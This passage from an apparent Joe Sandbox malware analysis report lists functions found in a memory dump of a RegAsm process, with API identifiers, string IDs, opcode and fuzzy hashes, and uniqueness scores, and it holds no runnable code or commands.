                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL ref: 0042E6C5
                                                                                                                                              • GetSystemMetrics.USER32 ref: 0042E6D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherMetricsSystemUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 365337688-0
                                                                                                                                              • Opcode ID: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
                                                                                                                                              • Instruction ID: c70253705267066fe0a390eb40da1e2c454f4fe67f9f49903ef1b4541bef4a9f
                                                                                                                                              • Opcode Fuzzy Hash: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
                                                                                                                                              • Instruction Fuzzy Hash: 5F319BB46197408FD750EF39D985A1ABBF0BB89304F40892EE998C73A0E731A945CF46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00438312 Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
                                                                                                                                              • Instruction ID: 1610e8cb5096fc1eed96c977c505dcc91df5b75474227e367c2d36b4526b057e
                                                                                                                                              • Opcode Fuzzy Hash: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
                                                                                                                                              • Instruction Fuzzy Hash: 00F0A574209340ABD708DB14D69099FFBE2AFCAA49F24881DE48583306C734EC43AE4A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043914C Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004391B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
                                                                                                                                              • Instruction ID: da42185ebec8373d7b22ee920953178115992f0127cd58568fcf92c2ed0c5c99
                                                                                                                                              • Opcode Fuzzy Hash: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
                                                                                                                                              • Instruction Fuzzy Hash: 7B01D274508341AFE710CF14D88475BFBB2EBC6324F209E49E8A417695C3B5ED4A9B8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 0042DDE0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 153clipboardCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                                                                                                              • String ID: 7$8$I$K$L$N
                                                                                                                                              • API String ID: 3829817484-2422513041
                                                                                                                                              • Opcode ID: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
                                                                                                                                              • Instruction ID: 8ed9dd40b2239205a4d96c9da8700085f56f38dffb9234c430860a7af855d13a
                                                                                                                                              • Opcode Fuzzy Hash: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
                                                                                                                                              • Instruction Fuzzy Hash: 0F5190B0A04740CFC721DF39D585616BBE0AF16314F548AADE8D68F796D334E805CBA6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041EF19 Relevance: 15.5, Strings: 12, Instructions: 473COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
                                                                                                                                              • API String ID: 0-3498391054
                                                                                                                                              • Opcode ID: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                                                                                              • Instruction ID: 62964ce6587a9f6e8b4bc72a90dd2b3cf09b0a553c01e9630c29236c2bf44c9c
                                                                                                                                              • Opcode Fuzzy Hash: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                                                                                              • Instruction Fuzzy Hash: D852FCB0205B858FE325CF25D494BD7BBE1BB06348F50892EC4EB5B645CB74A14ACF92
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041FBB5 Relevance: 15.5, Strings: 12, Instructions: 465COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
                                                                                                                                              • API String ID: 0-3498391054
                                                                                                                                              • Opcode ID: 17e1eef2c47546f5909f2ab459ea3df871a253adbcce23567c6d7a1e809ea18b
                                                                                                                                              • Instruction ID: 047a6880c081cc5f665bfd31f87bed186ae8e6b2cdbb109c5f5ad8525fb29fbb
                                                                                                                                              • Opcode Fuzzy Hash: 17e1eef2c47546f5909f2ab459ea3df871a253adbcce23567c6d7a1e809ea18b
                                                                                                                                              • Instruction Fuzzy Hash: 6F52FBB0205B858FE325CF25D494BD7BBE1BB06348F90891EC4EB5B646CB74A149CF92
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040F7CD Relevance: 13.8, Strings: 11, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: u=w$3yZ{$8MnO$9aBc$:m:o$Hik$M-q/$hI4K$u!|#$~w$q$s
                                                                                                                                              • API String ID: 0-1478902827
                                                                                                                                              • Opcode ID: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
                                                                                                                                              • Instruction ID: a799ed0fff6447343bd514cbacf28bedb163b3e05e2a36f77cc3edbc9f46f7b9
                                                                                                                                              • Opcode Fuzzy Hash: 7fc9041370a3a3983846bac274a0ed910bcf7d3cbc2af6b240ce81c8c7474168
                                                                                                                                              • Instruction Fuzzy Hash: AA51EBB45193C19BE674CF11D891B9FBBA1BBC6340F608E1CD5D92B254CB30904ACF96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00424240 Relevance: 9.0, Strings: 7, Instructions: 223COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID: ##*8$&>95$)5>Q$7&"4$8C$rr}t$4f
                                                                                                                                              • API String ID: 1279760036-3888404133
                                                                                                                                              • Opcode ID: 75e9084bf7dc8f8358964003a6f28c1663de380da6f4640a1865e0df872f19a1
                                                                                                                                              • Instruction ID: 3f6742af25c925c888f3af746ffa36932763abd1f696094f3cdaf422b2e53c93
                                                                                                                                              • Opcode Fuzzy Hash: 75e9084bf7dc8f8358964003a6f28c1663de380da6f4640a1865e0df872f19a1
                                                                                                                                              • Instruction Fuzzy Hash: 4D9157B4245B90CBE3268F25D4A0BE3BBE1FF56309F540A5DC4EB0B285C37AA4458F95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041D128 Relevance: 6.7, Strings: 5, Instructions: 493COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: "frc$#m8j$&zqi$=ksw$deks
                                                                                                                                              • API String ID: 0-420180677
                                                                                                                                              • Opcode ID: 24fb457cb41431979cf467ed9e60fa379f1c1d026843b3a604b61835dc222ffe
                                                                                                                                              • Instruction ID: c58cb54646a3eb14b49da7c51523dbab074ab8a0297049e6d9acae5f9d3fd762
                                                                                                                                              • Opcode Fuzzy Hash: 24fb457cb41431979cf467ed9e60fa379f1c1d026843b3a604b61835dc222ffe
                                                                                                                                              • Instruction Fuzzy Hash: B2029FB59083559FC324CF18C49076BBBE2BF86308F588A6DE4D59B391D738E841CB96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043B470 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: R-,T$R-,T$gxyz
                                                                                                                                              • API String ID: 0-1473045628
                                                                                                                                              • Opcode ID: 0b0337f593c6df23082d4b75dc60b2b2baa32265b9c7ea5effac9dbe5e4e04d7
                                                                                                                                              • Instruction ID: d43682651e4d1bbcca935c21765318abaecc161b347944d4f0b38a11893cb63e
                                                                                                                                              • Opcode Fuzzy Hash: 0b0337f593c6df23082d4b75dc60b2b2baa32265b9c7ea5effac9dbe5e4e04d7
                                                                                                                                              • Instruction Fuzzy Hash: 77A1BC726043129BC715CF18C49076BB7A2FF88324F29961EE9959B391D738EC15CBCA
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00416E69 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: /9++$756.
                                                                                                                                              • API String ID: 0-2948954884
                                                                                                                                              • Opcode ID: a014cfe3effdd53ad0569a5c0da46c576056ff92ac18762d3f8e3a7eb364fc7e
                                                                                                                                              • Instruction ID: cbd01cd0f0e0f6a1cd8aef29ed4a15310b76b2b422a9a27135592bbd613474a8
                                                                                                                                              • Opcode Fuzzy Hash: a014cfe3effdd53ad0569a5c0da46c576056ff92ac18762d3f8e3a7eb364fc7e
                                                                                                                                              • Instruction Fuzzy Hash: CAB1A070508B418BD329CF35C0A17A3BBE2BF96354F148A5EC0E74B791C739A486CB99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041B930 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              • Opcode ID: b996def426ce6c93dfb3c0d2b8574bf75d36e5b31bc495960c58811c0470f269
                                                                                                                                              • Instruction ID: 418ff68b172b6724851a5f9b45def2009d2e8c16223b2686ec42ef28e0ca92a7
                                                                                                                                              • Opcode Fuzzy Hash: b996def426ce6c93dfb3c0d2b8574bf75d36e5b31bc495960c58811c0470f269
                                                                                                                                              • Instruction Fuzzy Hash: F981D1B1A042059BDB24DF14C892BBB73B4EF85324F08452DE9959B391E738ED41C7EA
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041B2A0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ?mlk
                                                                                                                                              • API String ID: 0-3660313571
                                                                                                                                              • Opcode ID: 69b391067aedde1dc5241c6d9153a3fd8a133c152dfaad8eff51354b77e8172c
                                                                                                                                              • Instruction ID: 01c671782572adc667358f00788eb460e8e2c42b2d22e52cc5728f6b1ee1f78b
                                                                                                                                              • Opcode Fuzzy Hash: 69b391067aedde1dc5241c6d9153a3fd8a133c152dfaad8eff51354b77e8172c
                                                                                                                                              • Instruction Fuzzy Hash: 8D8105B15042148BDB14DF18C892BBB73B2EF95328F18825EE8964B391E739D845C7E6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00410C5B Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: JAF
                                                                                                                                              • API String ID: 0-4103162853
                                                                                                                                              • Opcode ID: 9128636b99eb7f40b603839eac4711fe0728de6b55a2a56fef665d4a45b70235
                                                                                                                                              • Instruction ID: cfe4e2a8978f3ae7d713284cd87d2e3eb9195a7231fafb701f6cf529d3db3fb2
                                                                                                                                              • Opcode Fuzzy Hash: 9128636b99eb7f40b603839eac4711fe0728de6b55a2a56fef665d4a45b70235
                                                                                                                                              • Instruction Fuzzy Hash: 37816DB0500B009FE735CF24C490BA7B7F6BF45314F148A2ED4AA87681E779B998CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004176E1 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              • Opcode ID: 84606cd881d82e9bb318d4f0a26b9851e8aa3b96b1d02f44d570d103868ee779
                                                                                                                                              • Instruction ID: 7b78dbaa38c7b21beee6cf440ef457b437b28244ea0c7ae6acfcb896623c88e2
                                                                                                                                              • Opcode Fuzzy Hash: 84606cd881d82e9bb318d4f0a26b9851e8aa3b96b1d02f44d570d103868ee779
                                                                                                                                              • Instruction Fuzzy Hash: A631D079A04A408FD325CF24C895BA7B7F2EB46304F58896ED497C7792DB38E846CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00413722 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              • Opcode ID: 91002e8592419f02679266217e0656b05884a03e323483f8f31014a3a2b85d26
                                                                                                                                              • Instruction ID: 75855608be2bda6d97df851f8e3a2661acfeea8d70f422b91aa9a116a9652a2c
                                                                                                                                              • Opcode Fuzzy Hash: 91002e8592419f02679266217e0656b05884a03e323483f8f31014a3a2b85d26
                                                                                                                                              • Instruction Fuzzy Hash: 442162752107419BD725CF24C881BA7B3B2FF81305F284A1EE596A7785D7B9F841CB48
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041347E Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              • Opcode ID: 6632e86e90320e603a285031c02ad9be3a03face611ce7db98c36edb2b210904
                                                                                                                                              • Instruction ID: 695dfa75bfd7b84a09a8389b6cc6ea945b72dffd246397d7a94960ee23ad2b5b
                                                                                                                                              • Opcode Fuzzy Hash: 6632e86e90320e603a285031c02ad9be3a03face611ce7db98c36edb2b210904
                                                                                                                                              • Instruction Fuzzy Hash: 3C21A134640B029BD7348F28C890BA7B7F2BB45315F14492CD2A787B92E379F8419B48
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00422B70 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: h3E
                                                                                                                                              • API String ID: 0-1264096165
                                                                                                                                              • Opcode ID: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
                                                                                                                                              • Instruction ID: 3c3bb655185b5af2888637fc8bac67708ee984c1cf6fe0d356e12da658f3a700
                                                                                                                                              • Opcode Fuzzy Hash: 3f696112414c2176a47e66b299e801a383e415b346e735ebcf3c7c746a3e6efe
                                                                                                                                              • Instruction Fuzzy Hash: 79F0C82020CBD19EC716CF299150676FFE0AF97605F1454CDD4D197362C21CD90ACB2A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00422B54 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: h3E
                                                                                                                                              • API String ID: 0-1264096165
                                                                                                                                              • Opcode ID: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
                                                                                                                                              • Instruction ID: 364beef6f316d3f83652dd8aa71acb0ec1cc879e8a2107f1598c1c26b9198e98
                                                                                                                                              • Opcode Fuzzy Hash: d95b8c7dad6f27eaeeba518d165f6ea783b51c0a4d661dd6bbb858999750f331
                                                                                                                                              • Instruction Fuzzy Hash: B9E0223020C7908EC309CF28E110236FBE1AF9B600F2454DED4C2D73A2C228DA07CA1A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041403B Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: :^F
                                                                                                                                              • API String ID: 0-1832529195
                                                                                                                                              • Opcode ID: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
                                                                                                                                              • Instruction ID: 7f238519bb71acc741d5806136ffcdbde4ed3e01776cef76c6de01323dd1d1f1
                                                                                                                                              • Opcode Fuzzy Hash: f8a9e0cc216a639e61236eec9da2288ad57904349f70ab7f3e7e58259bc75aec
                                                                                                                                              • Instruction Fuzzy Hash: 4BE01A5594F3C05FD7079B306C668A67F3A4BC7204B0E40EBD589CB2A3C4384A2DD36A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00411739 Relevance: .5, Instructions: 509COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 068fec51292eb0153f786f845102b85ca71fb8b30bd3bb33e2b1e054605888a3
                                                                                                                                              • Instruction ID: 0ed494a6543ca339513086986a4129f0b880fa6df34ef5ec732637b97b238257
                                                                                                                                              • Opcode Fuzzy Hash: 068fec51292eb0153f786f845102b85ca71fb8b30bd3bb33e2b1e054605888a3
                                                                                                                                              • Instruction Fuzzy Hash: BD127D71250B008BE325CF24C4917E7B7F2BF85304F088A2DD4AB87691EB7AB559CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00417BF5 Relevance: .3, Instructions: 341COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fa5c74de47e00e3fd1cbc8b8bf4f30cddb57eb3db75c3f68035aa95fc8bdd8f7
                                                                                                                                              • Instruction ID: 7bf09f208c8d42f402782dd01e8dcfad3d0292ea5e19e587d8160202315e0386
                                                                                                                                              • Opcode Fuzzy Hash: fa5c74de47e00e3fd1cbc8b8bf4f30cddb57eb3db75c3f68035aa95fc8bdd8f7
                                                                                                                                              • Instruction Fuzzy Hash: A8B18BB1504B018BD725CF24C4A1BA3B7F2FF85314F148A0ED8A64BB91D779B986CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00410F4D Relevance: .2, Instructions: 249COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0e1d513dcbe5ddf1e5a79446440b6df517490a6ef9966cf12ce402a64110efc1
                                                                                                                                              • Instruction ID: b397bc2b545a3e06a06c6f9a7b35e90c89a8d5b58e071fd8aed5b45881f06650
                                                                                                                                              • Opcode Fuzzy Hash: 0e1d513dcbe5ddf1e5a79446440b6df517490a6ef9966cf12ce402a64110efc1
                                                                                                                                              • Instruction Fuzzy Hash: D1818FB0500B008FD735CF25C4947A7B7E6AF89314F14892ED1AB87791E77AB889CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00416A62 Relevance: .2, Instructions: 222COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f01b2f0baba122d09bd3c3bd9327791873bdecd719347b9779de429d282b2145
                                                                                                                                              • Instruction ID: d15a5ba77c2942aaed52dfcd08f948692d97a9139cdbd11b09d40d24ee078bc7
                                                                                                                                              • Opcode Fuzzy Hash: f01b2f0baba122d09bd3c3bd9327791873bdecd719347b9779de429d282b2145
                                                                                                                                              • Instruction Fuzzy Hash: 1B61BD701083528BCB14CF14C861AABB3B1FFD6318F415A1CF8A65B2D1D735D845CB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00414F10 Relevance: .1, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
